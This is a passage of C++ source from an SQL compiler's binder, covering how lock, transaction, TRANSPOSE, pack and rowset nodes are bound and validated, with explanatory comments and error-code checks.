boundExpr; } // Describe::bindNode() // ----------------------------------------------------------------------- // member functions for class RelLock // ----------------------------------------------------------------------- RelExpr * RelLock::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // do not do override schema for this bindWA->setToOverrideSchema(FALSE); // Get the NATable for this object. NATable *naTable = bindWA->getNATable(getTableName()); if (bindWA->errStatus()) return this; NABoolean isView = !!naTable->getViewText(); if (isView && !naTable->isAnMV()) { *CmpCommon::diags() << DgSqlCode(-4222) << DgString0("Views"); bindWA->setErrStatus(); return this; } else { baseTableNameList_.insert((CorrName *)getPtrToTableName()); } Int32 locSpec = 0; NAString tabNames(bindWA->wHeap()); for (CollIndex i = 0; i < baseTableNameList_.entries(); i++) { naTable = bindWA->getNATable(*baseTableNameList_[i]); if (bindWA->errStatus()) return this; // Genesis 10-990212-6908: // Ignore the user-specified correlation name -- // use just the 3-part tblname (and any LOCATION clause, etc). // Then, insert only unique names into tabIds_ -- // to prevent XTNM duplicates (errmsg 4056) // when multiple layered views reference the same table or corr-name. 
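      // For example, a lock on a view that references the same base table
      // under two different correlation names ends up with a single
      // TableDesc (and a single name in the 4124 warning text) for that
      // table.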
CorrName bt(*baseTableNameList_[i]); bt.setCorrName(""); NABoolean haveTDforThisBT = FALSE; for (CollIndex j = 0; j < tabIds_.entries(); j++) { if (bt == tabIds_[j]->getCorrNameObj()) { haveTDforThisBT = TRUE; break; } } if (!haveTDforThisBT) { if (bt.isLocationNameSpecified()) locSpec++; tabNames += NAString(", ") + bt.getQualifiedNameObj().getQualifiedNameAsAnsiString(); tabIds_.insert(bindWA->createTableDesc(naTable, bt)); if (bindWA->errStatus()) return this; } } if (tabIds_.entries() > 1) { CMPASSERT(locSpec == 0); tabNames.remove(0, 2); // remove leading ", " // Warning 4124: More than one table will be locked: $0~String0. // (warning, so user realizes the effects of this command // when run on a view which joins tables...). *CmpCommon::diags() << DgSqlCode(+4124) << DgString0(tabNames); } if ((isView) || (tabIds_.entries() > 1) || (baseTableNameList_.entries() > 1) || (CmpCommon::getDefault(ATTEMPT_ESP_PARALLELISM) == DF_OFF)) { parallelExecution_ = FALSE; } // Allocate an empty RETDesc and attach it to this node and the BindScope. setRETDesc(new(bindWA->wHeap()) RETDesc(bindWA)); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // Bind the base class. return bindSelf(bindWA); } // RelLock::bindNode() // ----------------------------------------------------------------------- // member functions for class RelTransaction // ----------------------------------------------------------------------- RelExpr * RelTransaction::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Allocate an empty RETDesc and attach it to this node and the BindScope. setRETDesc(new(bindWA->wHeap()) RETDesc(bindWA)); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); if (diagAreaSizeExpr_) { diagAreaSizeExpr_->bindNode(bindWA); if (bindWA->errStatus()) return this; } // "mode_" is NULL if BEGIN/COMMIT/ROLLBACK WORK, nonNULL if SET TRANSACTION. if (mode_) { if ((mode_->autoCommit() != TransMode::AC_NOT_SPECIFIED_) || (mode_->getAutoBeginOn() != 0) || (mode_->getAutoBeginOff() != 0)) { CMPASSERT(mode_->isolationLevel() == TransMode::IL_NOT_SPECIFIED_ && mode_->accessMode() == TransMode::AM_NOT_SPECIFIED_); } else { // See Ansi 14.1, especially SR 4. // Similar code must be maintained in // comexe/ExControlArea::addControl() and NADefaults::validateAndInsert(). // SET TRANSACTION w/o specifying ISOLATION LEVEL reverts TransMode to // the NADefaults setting of ISOLATION_LEVEL // (which the user should set to SERIALIZABLE if they want // SET TRANSACTION to be Ansi conformant). 
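    // Roughly: an unspecified isolation level is filled in from the
    // ISOLATION_LEVEL default (possibly overridden by
    // ISOLATION_LEVEL_FOR_UPDATES), an unspecified access mode is then
    // derived from that isolation level, and the READ WRITE plus
    // READ UNCOMMITTED combination is rejected with error 3114.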
if (mode_->isolationLevel() == TransMode::IL_NOT_SPECIFIED_) { if (CmpCommon::getDefault(ISOLATION_LEVEL_FOR_UPDATES) == DF_NONE) bindWA->getSchemaDB()->getDefaults().getIsolationLevel( mode_->isolationLevel()); // short int else bindWA->getSchemaDB()->getDefaults().getIsolationLevel( mode_->isolationLevel(), // short int CmpCommon::getDefault(ISOLATION_LEVEL_FOR_UPDATES)); } if (mode_->accessMode() == TransMode::AM_NOT_SPECIFIED_) mode_->updateAccessModeFromIsolationLevel( mode_->getIsolationLevel()); // enum // 3114 Transaction access mode RW is incompatible with isolation level RU if (mode_->accessMode() == TransMode::READ_WRITE_ && mode_->isolationLevel() == TransMode::READ_UNCOMMITTED_) { *CmpCommon::diags() << DgSqlCode(-3114); bindWA->setErrStatus(); return this; } if (mode_->rollbackMode() == TransMode::ROLLBACK_MODE_NOT_SPECIFIED_) mode_->rollbackMode() = TransMode::ROLLBACK_MODE_WAITED_ ; // 4352 - if (mode_->multiCommit() == TransMode::MC_ON_) { if (mode_->invalidMultiCommitCompatibility()) { *CmpCommon::diags() << DgSqlCode(-4352); bindWA->setErrStatus(); return this; } } } } // SET TRANSACTION stmt // Bind the base class. return bindSelf(bindWA); } // Transpose::bindNode - Bind the transpose node. // Coming into the node (from the parser) there are two ItemExpr Trees: // // keyCol_: The ItemExpr contains a ColReference to the key column which // is added by the transpose node. This pointer ia set to NULL by bindNode. // If keyCol_ is NULL coming into the bindNode, then no key Column is // generated for this transpose. // // transValsTree_: This ItemExpr tree contains a list of pairs which is // NULL terminated (for ease of processing). Each pair contains in child(0), // a list of transpose items for a given transpose set and in child(1), a // list of ColReferences to the new value columns associated with this // transpose set. A transpose item is a list of value expressions. // This pointer is set to NULL by bindNode. // // For Example: // // SELECT * // FROM Table // TRANSPOSE A,B AS C1 // X,Y,Z as C2 // (1,'hello'),(2,'world') AS (C3, C4) // KEY BY K1 // // For the above query, after parsing, the TRANSPOSE node will look like: // // TRANSPOSE // keyCol_ transValsTree_ // | | // K1 O------O---------O---NULL // | | | // O O O--O // |\ |\ | |\ // O C1 O C2 | C3 C4 // |\ |\ O---------O---NULL // A O X O | | // |\ |\ O O // B NULL Y O |\ |\ // |\ 1 'hello' 2 'world' // Z NULL // // O - represent ITM_LIST nodes. // // bindNode binds this structure to form a new structure contained in // the vector of ValueIdLists, transUnionVector_. // // transUnionVector_: This is a vector of ValueIdLists. There is one entry // for each transpose set, plus one entry for the key values. Each entry // contains a list of ValueIdUnion Nodes. The first entry contains a list // with one ValueIdUnion node. This node is for the Const. Values (1 - N) // representing the Key Values. The other entries contain lists of // ValueIdUnion nodes for the Transposed Values. Each of these entries of // the vector represent a transpose set. If the transpose set contains a // list of values, then there will be only one ValueIdUnion node in the // list. If the transpose set contains a list of lists of values, then // there will be as many ValueIdUnion nodes as there are items in the // sublists. (see example below.) // transUnionVector_ is generated in bindNode(). // // transUnionVectorSize_: This is the number of entries in transUnionVector_. 
// // For the above query, after binding, the TRANSPOSE node will look like: // // TRANSPOSE // transUnionVectorSize_: 4 // transUnionVector_: // ValueIdUnion(1,2,3,4,5,6,7) // ValueIdUnion(A,B) // ValueIdUnion(X,Y,Z) // ValueIdUnion(1,2) , ValueIdUnion('hello','world') // // RelExpr *Transpose::bindNode(BindWA *bindWA) { // If this node has already been bound, we are done. // if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } BindContext *curContext = bindWA->getCurrentScope()->context(); curContext->inTransposeClause() = TRUE; // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // At this point the Transpose relational operator has two or three // expressions: // keyCol_ --- A ColReference to the new keyCol. (possibly NULL) // transValsTree_ --- expressions for the transposed values and their // ColReferences. // // transpose::bindNode() performs the following steps: // // 1 - Construct a list of transpose set expressions // and a list of ColReferences associated with each transpose set // expression. // // 2 - Allocate a return descriptor and add the columns from the // childs descriptor to it. // // 3 - Allocate the transUnionVector_ // // 4 - Construct a ValueIdUnion node for the Key Values. Bind this node. // Add the keyColName to the return descriptor with the valueId of this // node. Add the valueId of this node as the first entry of // a ValueIdList in the first entry of transUnionVector_. // // 5 - For each transpose set, Construct as many ValueIdUnion nodes as // there are values in each item of the transpose set. Within a // given transpose set, the number of values per item must be the // same. In the example above, the third transpose set contains the // items (1, 'hello') and (2, 'world'). These both have two values per // item. The others all have 1 value per item. The ValueIdUnions // generated will contain the i'th value from each item. Bind each // of these ValueUnionId nodes. Add the value column name to the // return descriptor with the valueId of this node. Add the valueId // of this node the ValueIdList in the proper entry of // transUnionVector_. // // 6 - Set the return descriptor, and bindSelf. // CollIndex i, j, k; CollIndex numTransSets = 0; // Get a pointer to the head of this list of pairs. // This is the last time we will have to reference this tree. // ItemExpr *transTree = (ItemExpr *)removeTransValsTree(); // Allocate two ItemExpr Lists. One for the list of lists of (lists of) // expressions. And the other for the list of (lists of) ColReferences. // ItemExprList transSetsList(bindWA->wHeap()); ItemExprList newColsList(bindWA->wHeap()); // Populate these lists and // determine how many transpose sets there are in this tree. // In the example above, there should be three. // while (transTree) { transSetsList.insert(transTree->child(0)->child(0)); newColsList.insert(transTree->child(0)->child(1)); numTransSets++; transTree = transTree->child(1); } // Must have at least one value expression in the transpose values list. // CMPASSERT(numTransSets > 0); // Using the example above, at this point: // // transSetsList newColsList // | | | | | | // O O O---------O---NULL C1 C2 O // |\ |\ | | |\ // A O X O O O C3 C4 // |\ |\ |\ |\ // B NULL Y O 1 'hello' 2 'world' // |\ // Z NULL // // Allocate the return descriptor. This will contain the // columns of the child node as well as the new columns added // by the transpose operator. 
The column order is: // // [childs columns][keyCol][valCol1][valCol2] ... // // Using the example, this would be: // // [childs columns], K1, C1, C2, C3, C4 // RETDesc *resultTable = new(bindWA->wHeap()) RETDesc(bindWA); // Add the columns from the child to the RETDesc. // const RETDesc &childTable = *child(0)->getRETDesc(); resultTable->addColumns(bindWA, childTable); transUnionVectorSize_ = numTransSets + 1; transUnionVector() = new(bindWA->wHeap()) ValueIdList[transUnionVectorSize_]; // Get the key column reference // This is the last time we need this ItemExpr. // ColReference *keyColumn = (ColReference *)removeKeyCol(); // If no key column has been specified, then no key col will be // generated. // if (keyColumn) { //Get the key column name. // NAString keyColName(keyColumn->getColRefNameObj().getColName(), bindWA->wHeap()); // Construct and Bind the ValueIdUnion node as the union of constants // from 1 to the total number of transpose expressions. In the above // example this will be from 1 to 9, since there are 3 transpose sets // and each set has 3 expressions. // ValueIdList constVals; ItemExpr *constExpr; CollIndex keyVal; // For each expression in each transpose set. // for (i = 0, keyVal = 1; i < numTransSets; i++) { // Determine how many expressions are in each transpose set. // CollIndex numTransItems = 0; ItemExpr *transSet = transSetsList[i]; while (transSet) { numTransItems++; transSet = transSet->child(1); } for (j = 0; j < numTransItems; j++, keyVal++) { // Construct the constant value // #pragma nowarn(1506) // warning elimination constExpr = new(bindWA->wHeap()) SystemLiteral(keyVal); #pragma warn(1506) // warning elimination // Bind the constant value. // constExpr->bindNode(bindWA); if (bindWA->errStatus()) return this; // Insert the valueId into the list // constVals.insert(constExpr->getValueId()); } } // Construct the ValueIdUnion node which will represent the key Col. // ValueIdUnion *keyVidu = new(bindWA->wHeap()) ValueIdUnion(constVals, NULL_VALUE_ID); // Bind the ValueIdUnion node. // keyVidu->bindNode(bindWA); if (bindWA->errStatus()) return this; // Add the key column to the RETDesc (as the union of all the constants) // resultTable->addColumn(bindWA, keyColName, keyVidu->getValueId()); // The ValueIdUnion for the Key Values is the first entry in // the ValueIdList of the first entry of transUnionVector_. // transUnionVector()[0].insert(keyVidu->getValueId()); } // For each transpose set, // - bind the list of expressions. // - Construct a ValueIdUnion node containing the resulting valueIds. // - Bind this ValueIdUnion node // - Add the associate column name to the return descriptor with the // valueId of the ValueIdUnion node. // ValueIdList transVals; for (i = 0; i < numTransSets; i++) { // The column(s) associated with this transpose set. // (will be used below, within the inner loop) // ItemExprList newCols(newColsList[i], bindWA->wHeap()); // Determine how many expressions are in each transpose set. // CollIndex numTransItems = 0; ItemExpr *transSet = transSetsList[i]; ItemExprList transItemList(bindWA->wHeap()); // Populate this list. // while (transSet) { transItemList.insert(transSet->child(0)); numTransItems++; transSet = transSet->child(1); } ItemExprList transItem(transItemList[0], bindWA->wHeap()); CollIndex numTransVals = transItem.entries(); // For a given transpose set, the number of new columns declared // must be the same as the number of items per value. 
In the example // above, the third transpose set contains the items (1, 'hello') and // the columns (C3,C4) both have two entries. // if (numTransVals != newCols.entries()) { *CmpCommon::diags() << DgSqlCode(-4088); bindWA->setErrStatus(); return this; } for (k = 0; k < numTransVals; k++) { ItemExpr *transValueUnionExpr = NULL; for (j = 0; j < numTransItems; j++) { transItem.clear(); transItem.insertTree(transItemList[j], ITM_ITEM_LIST); // Within a given transpose set, the number of values per item // must be the same. In the example above, the third transpose // set contains the items (1, 'hello') and (2, 'world'). These // both have two values per item. The others all have 1 value // per item. // if (numTransVals != transItem.entries()) { *CmpCommon::diags() << DgSqlCode(-4088); bindWA->setErrStatus(); return this; } if (transValueUnionExpr == NULL) { transValueUnionExpr = transItem[k]; } else { transValueUnionExpr = new (bindWA->wHeap()) ItemList(transValueUnionExpr, transItem[k]); } } // Bind the Transpose Values expressions. Get the expression value Id's // transVals.clear(); if(transValueUnionExpr != NULL ) transValueUnionExpr->convertToValueIdList(transVals, bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return this; // If there are more than one transpose set, the value columns // generated by transpose can be NULL. So, make sure the typing is // done properly. This is done by setting the first in the list to // be nullable, then the ValueIdUnion will be nullable and the new // column will be nullable. This is not done on the ValueIdUnion // node itself, since it will add an Null Instantiate node, and // we later assume that this node will always be a ValueIdUnion // node. // if (numTransSets > 1) { ValueId valId = transVals[0]; transVals[0] = valId.nullInstantiate(bindWA, FALSE); } // Construct and Bind the ValueIdUnion node for the transpose vals. // ValueIdUnion *valVidu = new(bindWA->wHeap()) ValueIdUnion(transVals, NULL_VALUE_ID); valVidu->bindNode(bindWA); if (bindWA->errStatus()) return this; // Insert this valueIdUnion node into the list of valueIdUnions // in the proper entry in transUnionVector_ // transUnionVector()[i + 1].insert(valVidu->getValueId()); // Get the val column reference // ColReference *valCol = (ColReference *)newCols[k]; // Must have Column Refs to val column. // CMPASSERT(valCol); //Get the val column name. // NAString valColName( valCol->getColRefNameObj().getColName(), bindWA->wHeap()); // Add the transpose column // (as the union of all of the transposed value columns) // resultTable->addColumn(bindWA, valColName, valVidu->getValueId()); } } // Set the return descriptor // setRETDesc(resultTable); bindWA->getCurrentScope()->setRETDesc(resultTable); // // Bind the base class. // return bindSelf(bindWA); } // Transpose::bindNode() // ----------------------------------------------------------------------- // The Pack node binds itself by componsing its packing expression from // all the columns available in its child's RETDesc. The packed columns // produced by the packing expression are then made available in the Pack // node's own RETDesc. 
// ----------------------------------------------------------------------- RelExpr* Pack::bindNode(BindWA* bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } bindChildren(bindWA); if (bindWA->errStatus()) return this; // --------------------------------------------------------------------- // The Pack node has a packing expression stored as packingExprTree_ // before binding. If packingExprTree_ is NULL, we are just going to // pick up all the columns from the output of its child. During binding, // this tree is converted into a value id list. // --------------------------------------------------------------------- // Create and bind the packing factor item expression. #pragma nowarn(1506) // warning elimination ItemExpr* pfie = new (bindWA->wHeap()) SystemLiteral(packingFactorLong()); #pragma warn(1506) // warning elimination pfie->bindNode(bindWA); if (bindWA->errStatus()) return this; // Insert vid of bound constant into packingFactor valueIdSet. packingFactor().clear(); packingFactor().insert(pfie->getValueId()); // Create my RETDesc to hold the packed columns. RETDesc* resultTable = new (bindWA->wHeap()) RETDesc (bindWA); // Bind the tree if its present. if (packingExprTree_) { ItemExpr* packExprTree = removePackingExprTree(); packExprTree->convertToValueIdList(packingExpr(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return this; for (CollIndex i = 0; i < packingExpr().entries(); i++) { // Add all columns to result table. NAString packedColName( "PACKEDCOL_", bindWA->wHeap()); packedColName += bindWA->fabricateUniqueName(); #pragma nowarn(1506) // warning elimination Int32 length = packedColName.length(); #pragma warn(1506) // warning elimination char * colName = new (bindWA->wHeap()) char[length + 1]; colName[length] = 0; #pragma nowarn(1506) // warning elimination str_cpy_all(colName, packedColName, packedColName.length()); #pragma warn(1506) // warning elimination ColRefName colRefName(colName); resultTable->addColumn(bindWA, colRefName, packingExpr().at(i), USER_COLUMN, colName); } } else // no packing expr tree, get all the columns from child. { // Get RETDesc from child which is assumed to be a RelRoot. too strict? const RETDesc& childTable = *child(0)->getRETDesc(); ValueIdList childTableVidList; // These are only the user columns. Are SYS columns important? childTable.getValueIdList(childTableVidList); // Initialize packing expression. packingExpr().clear(); // For each column in child's RETDesc, put a PackFunc() on top of it. for (CollIndex i = 0; i < childTableVidList.entries(); i++) { ItemExpr* childItemExpr = childTableVidList[i].getItemExpr(); PackFunc* packedItemExpr = new (bindWA->wHeap()) PackFunc(childItemExpr,pfie); // Bind the packed column. packedItemExpr->bindNode(bindWA); if (bindWA->errStatus()) return this; // Insert into both the result table and my packingExpr_. packingExpr().insert(packedItemExpr->getValueId()); // $$$ Any implications of this? Needed to be seen. // Use the original column name as the packed column name. The index // is on USER columns only. SYS columns matter? ColRefName colRefName = childTable.getColRefNameObj(i); const char* heading = childTable.getHeading(i); // Insert into RETDesc for RelRoot above it to pick up as select-list. resultTable->addColumn(bindWA, colRefName, packedItemExpr->getValueId(), USER_COLUMN, heading); // $$$ // OR: start with making a copy of child's RETDesc and change each col // to point to the vid for the packed column instead of the original. 
} } // Set the result table, bind self and return. setRETDesc(resultTable); bindWA->getCurrentScope()->setRETDesc(resultTable); bindSelf(bindWA); // To test packing. Add a unpack node on top of this pack node to check. char* env = getenv("PACKING_FACTOR"); if (env && atol(env) > 0) { Lng32 pf = atol(env); ItemExpr* unPackExpr = NULL; ItemExpr* rowFilter = NULL; ItemExpr* unPackItem; ItemExpr* numRows; const NAType* typeInt = new(bindWA->wHeap()) SQLInt(TRUE,FALSE); ValueIdList packedCols; resultTable->getValueIdList(packedCols); NAString hostVarName("_sys_UnPackIndex", bindWA->wHeap()); hostVarName += bindWA->fabricateUniqueName(); ItemExpr* indexHostVar = new(bindWA->wHeap()) HostVar(hostVarName,new(bindWA->wHeap()) SQLInt(TRUE,FALSE),TRUE); indexHostVar->synthTypeAndValueId(); for (CollIndex i=0; i < packedCols.entries(); i++) { const NAType* colType = &(packedCols[i].getItemExpr()->child(0)->getValueId().getType()); Lng32 width = colType->getNominalSize(); #pragma nowarn(1506) // warning elimination Lng32 base = (colType->supportsSQLnullPhysical() ? (pf-1)/CHAR_BIT +1 : 0) + sizeof(Int32); #pragma warn(1506) // warning elimination // $$$ Some duplicate code to be moved to PackColDesc later. ColRefName colRefName; colRefName = resultTable->getColRefNameObj(i); unPackItem = new(bindWA->wHeap()) UnPackCol(packedCols[i].getItemExpr(), indexHostVar, width, base, colType->supportsSQLnull(), colType); numRows = new(bindWA->wHeap()) UnPackCol(packedCols[i].getItemExpr(), new(bindWA->wHeap()) SystemLiteral(0), typeInt->getNominalSize(), 0, FALSE, typeInt); unPackExpr = (unPackExpr ? new(bindWA->wHeap()) ItemList(unPackExpr,unPackItem) : unPackItem); rowFilter = (rowFilter ? new(bindWA->wHeap()) ItemList(rowFilter,numRows) : numRows); } RelExpr* unpack = new(bindWA->wHeap()) UnPackRows(pf,unPackExpr,rowFilter,NULL, this, indexHostVar->getValueId()); return unpack->bindNode(bindWA); } return this; } // Pack::bindNode() RelExpr * Rowset::bindNode(BindWA* bindWA) { // If this node has already been bound, we are done. if (nodeIsBound()) return this->transformRelexpr_; if (bindWA->getHostArraysArea()) { bindWA->getHostArraysArea()->done() = TRUE; } // // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // Transform current node into a new subtree which performs access to // RowSet based on the unpacking and tuple node expression operators. // The formed tuple is composed of all input RowSet host variables: // Rowset-tuple: array_hv1, array_hv2, ... array_hvN. // The Unpack expression is used to retrieve the elements of the Rowset // with an indexed operator. For example, retrieve values for index two // for each Rowset host variable. // The transformed subtree has the following structure // // UNPACK // | // TUPLE // // Note that the original Rowset relational expression has a rename node // on top. // // First find the maxRowSetSize and its rowsetSizeExpr. The rowset size is // the smallest declared dimension of the arrays composing the rowset. // If a constant rowset size was given in the SQL statement, it must be // samaller than the computed value. NABoolean hasDifferentSizes = FALSE; Lng32 maxRowsetSize = 0; /* Maximum number of Rows in Rowset */ ItemExpr *rowsetSizeExpr; ItemExpr *hostVarTree; // We get the list of input host vars, which is stored in the root of the // parse tree HostArraysWA *arrayArea = bindWA->getHostArraysArea(); RelRoot *root = bindWA->getTopRoot(); // Do any extra checking at this moment. 
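  // The loop below validates each input host variable of the rowset: every
  // entry must be a host variable array (else error 30001) with a positive
  // declared dimension (else 30004); differing dimensions draw warning 30005
  // for static SQL (error 30015 for dynamic rowsets) and the smallest
  // dimension wins; finally the element type's nullability is forced to
  // match the presence of a null indicator variable.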
for (hostVarTree = inputHostvars_; hostVarTree; hostVarTree = hostVarTree->child(1)) { CMPASSERT(hostVarTree->getOperatorType() == ITM_ITEM_LIST); HostVar *hostVar = (HostVar *)hostVarTree->getChild(0); if (hostVar->getOperatorType() != ITM_HOSTVAR || hostVar->getType()->getTypeQualifier() != NA_ROWSET_TYPE) { // 30001 A rowset must be composed of host variable arrays *CmpCommon::diags() << DgSqlCode(-30001); bindWA->setErrStatus(); return NULL; } // Get the smallest dimension for rowset size SQLRowset* hostVarType = (SQLRowset *)hostVar->getType(); if (hostVarType->getNumElements() <= 0) { // 30004 The dimesion of the arrays composing the RowSet must be greater // than zero. A value of $0~Int0 was given *CmpCommon::diags() << DgSqlCode(-30004) << DgInt0((Int32)hostVarType->getNumElements()); bindWA->setErrStatus(); return NULL; } if (maxRowsetSize == 0) maxRowsetSize = hostVarType->getNumElements(); else if (hostVarType->getNumElements() != maxRowsetSize) { // 30005 The dimensions of the arrays composing the RowSet are // different. The smallest dimesnion is assumed. // This is just a warning // Give the warning only once if (hasDifferentSizes == FALSE) { if (arrayArea->hasDynamicRowsets()) { // 30015 The dimesion of the arrays composing the RowSet must be same // in dynamic SQL *CmpCommon::diags() << DgSqlCode(-30015) ; bindWA->setErrStatus(); return NULL; } // for static SQL this is only a warning. hasDifferentSizes = TRUE; *CmpCommon::diags() << DgSqlCode(30005); } // Pick the smallest one if (hostVarType->getNumElements() < maxRowsetSize) maxRowsetSize = hostVarType->getNumElements(); } // Make sure that the element type null indicator and the corresponding // rowset array are both nullable or not nullable. That is, force it NAType* hostVarElemType = hostVarType->getElementType(); NABoolean hostVarElemNullInd = !(hostVar->getIndName().isNull()); // If hostVarType is Unknown then this a dynamic param that has been // converted into a hostvar. For dynamic params there is no null // indicator variable/param specified in the query text, so the previous // check will always return FALSE. We will set all dynamic params to be // nullable and let type synthesis infer nullability later on. if (hostVarElemType->getTypeQualifier() == NA_UNKNOWN_TYPE) hostVarElemNullInd = TRUE; hostVarElemType->setNullable(hostVarElemNullInd); } // If a rowset size expression was produced during parsing, it is used // to restrict the rowset size during execution. The expression must be // an numeric literal (known at compile time) or an integer host variable // (known at execution time). We do not allow other type of expression // since the rowset size must be know before the statement is executed to // avoid copying a lot when the host variable arrays are sent down the // execution queue // If there is no size specification of the form ROWSET <size> ( <list> ) then // we take the size from ROWSET FOR INPUT SIZE <size> if (!sizeExpr_ && bindWA->getHostArraysArea()) { sizeExpr_ = bindWA->getHostArraysArea()->inputSize(); if ((bindWA->getHostArraysArea()->getInputArrayMaxSize() > 0) && (!sizeExpr_ )) { // ODBC process is performing a bulk insert and we need to create // an input parameter to simulate the functionality of ROWSET FOR INPUT // SIZE ... syntax. 
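      // The host variable fabricated below stands in for that size
      // parameter: it is flagged via setHVRowsetForInputSize() and added to
      // the root's input variable list so ODBC can supply the actual size at
      // execution time.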
NAString name = "__arrayinputsize" ; HostVar *node = new (bindWA->wHeap()) HostVar(name, new(bindWA->wHeap()) SQLInt(TRUE,FALSE), TRUE); node->setHVRowsetForInputSize(); root->addAtTopOfInputVarTree(node); sizeExpr_ = (ItemExpr *) node ; } } if (sizeExpr_) { if (sizeExpr_->getOperatorType() == ITM_CONSTANT) { if (((ConstValue *)sizeExpr_)->getType()->getTypeQualifier() != NA_NUMERIC_TYPE) { // 30003 Rowset size must be an integer host variable or an // integer constant *CmpCommon::diags() << DgSqlCode(-30003); bindWA->setErrStatus(); return NULL; } if (((ConstValue *)sizeExpr_)->getExactNumericValue() <= 0) { // 30004 The dimesion of the arrays composing the RowSet must be // greater than zero. A value of $0~Int0 was given *CmpCommon::diags() << DgSqlCode(-30004) << DgInt0((Int32) (((ConstValue *)sizeExpr_) ->getExactNumericValue())); bindWA->setErrStatus(); return NULL; } if (((ConstValue *)sizeExpr_)->getExactNumericValue() > maxRowsetSize) { // 30002 The given RowSet size ($0~Int0) must be smaller or // equal to the smallest dimension ($1Int1) of the // arrays composing the rowset *CmpCommon::diags() << DgSqlCode(-30002) << DgInt0((Int32) ((ConstValue *)sizeExpr_) ->getExactNumericValue()) << DgInt1(maxRowsetSize); bindWA->setErrStatus(); return NULL; } else { maxRowsetSize = (Lng32)((ConstValue *)sizeExpr_)->getExactNumericValue() ; } } else if (!((sizeExpr_->getOperatorType() == ITM_HOSTVAR && ((HostVar *)sizeExpr_)->getType()->getTypeQualifier() == NA_NUMERIC_TYPE) || (sizeExpr_->getOperatorType() == ITM_DYN_PARAM ) || ((sizeExpr_->getOperatorType() == ITM_CAST) && (sizeExpr_->child(0)->getOperatorType() == ITM_DYN_PARAM)))) { // 30003 Rowset size must be an integer host variable or an // integer constant *CmpCommon::diags() << DgSqlCode(-30014); bindWA->setErrStatus(); return NULL; } // We return a -1 if the execution time rowset size exceeds the maximum // declared size ItemExpr *maxSize = new (bindWA->wHeap()) SystemLiteral(maxRowsetSize); ItemExpr *neg = new (bindWA->wHeap()) SystemLiteral(-1); ItemExpr *constrPred = new (bindWA->wHeap()) BiRelat(ITM_GREATER, sizeExpr_, maxSize); rowsetSizeExpr = new (bindWA->wHeap()) IfThenElse(constrPred, neg, sizeExpr_); // IfThenElse only works if Case is its parent. rowsetSizeExpr = new (bindWA->wHeap()) Case (NULL, rowsetSizeExpr); // At code generation time, it is assumed that the size expression // is of size integer, so we do this cast. We do not allow null // values. rowsetSizeExpr = new (bindWA->wHeap()) Cast(rowsetSizeExpr, new (bindWA->wHeap()) SQLInt(TRUE,FALSE)); // For dynamic rowsets, the parameter specifying rowset for input size // must be typed as an non-nullable integer. if (sizeExpr_->getOperatorType() == ITM_DYN_PARAM ) { sizeExpr_->synthTypeAndValueId(); SQLInt intType(TRUE,FALSE); // TRUE -> allow neagtive values, FALSE -> not nullable (sizeExpr_->getValueId()).coerceType(intType, NA_NUMERIC_TYPE); } } else { rowsetSizeExpr = new (bindWA->wHeap()) SystemLiteral(maxRowsetSize); } // Construct an index host variable to iterate over the elements of the // rowset. The name of the host variable must be unique (fabricated // by calling fabricateUniqueName). This host variable is bound since it // is not an input of the parse tree. Call synthTypeAndValueId() // which does the minimum binding. NAString indexName(bindWA->wHeap()); if (indexExpr_) { // Get the name. 
indexName = ((ColReference *)indexExpr_)->getColRefNameObj().getColName(); } else { indexName = "_sys_rowset_index" + bindWA->fabricateUniqueName(); } const NAType *indexType = new (bindWA->wHeap()) SQLInt(TRUE, FALSE); ItemExpr *indexHostVar = new (bindWA->wHeap()) HostVar(indexName, indexType, TRUE // is system-generated ); indexHostVar->synthTypeAndValueId(); // Generate the RowsetArrayScan expressions which are used to extract // an element value of the rowset array given an index. ItemExpr *unPackExpr = NULL; for (hostVarTree = inputHostvars_; hostVarTree; hostVarTree = hostVarTree->child(1)) { HostVar *hostVar = (HostVar *)hostVarTree->getChild(0); SQLRowset* hostVarType = (SQLRowset *)hostVar->getType(); NAType* hostVarElemType = hostVarType->getElementType(); Lng32 hostVarElemSize = hostVarElemType->getTotalSize(); NABoolean hostVarElemNullInd = !(hostVar->getIndName().isNull()); // Force all host variable to have the same number of elements which was // found previously hostVarType->setNumElements(maxRowsetSize); // The element size must be align hostVarElemSize = ALIGN(hostVarElemSize, hostVarElemType->getDataAlignment()); // Assign a valueId for this Host variable. UnPackRows node will need // this valueId during its binding. //hostVar->synthTypeAndValueId(); hostVar->bindNode(bindWA); ItemExpr *unPackCol = new (bindWA->wHeap()) RowsetArrayScan(hostVar, // Rowset Host Var array indexHostVar, // Index maxRowsetSize, // Cannot go over this size hostVarElemSize, // Element size in bytes hostVarElemNullInd, hostVarElemType ); // Construct a list of expressions to extract the Data value from // the packed row. During normalization, this list (or a ValueIdList // representing this list) will be reduced to the minimum required. // This should be a NULL terminated list, unfortunately, there are // many parts in the SQL/MX code that loops over the arity instead // of checking for NULL terminated list...the effect a segmentation // violation. unPackExpr = (unPackExpr ? new (bindWA->wHeap()) ItemList(unPackExpr, unPackCol) : unPackCol); } // enable rowsetrowcount for rowset update and deletes // if the user has not turned the feature OFF. // if we have rowsets in where clause and are not in a select // then we have either rowset ypdate or delete, for direct rowsets. if (arrayArea && (!(arrayArea->getHasDerivedRowsets())) && arrayArea->hasHostArraysInWhereClause() && (arrayArea->hasInputRowsetsInSelectPredicate() != HostArraysWA::YES_) && (CmpCommon::getDefault(ROWSET_ROW_COUNT) == DF_ON)) { arrayArea->setRowsetRowCountArraySize(maxRowsetSize); } if (indexExpr_) { /* * Create and item expression to obtain the index */ ItemExpr *unPackCol = new (bindWA->wHeap()) RowsetArrayScan(indexHostVar, // Index indexHostVar, // Index maxRowsetSize, // Cannot go over this size indexType->getTotalSize(), 0, indexType, ITM_ROWSETARRAY_ROWID ); unPackExpr = (unPackExpr ? new (bindWA->wHeap()) ItemList(unPackExpr, unPackCol) : unPackCol); } // 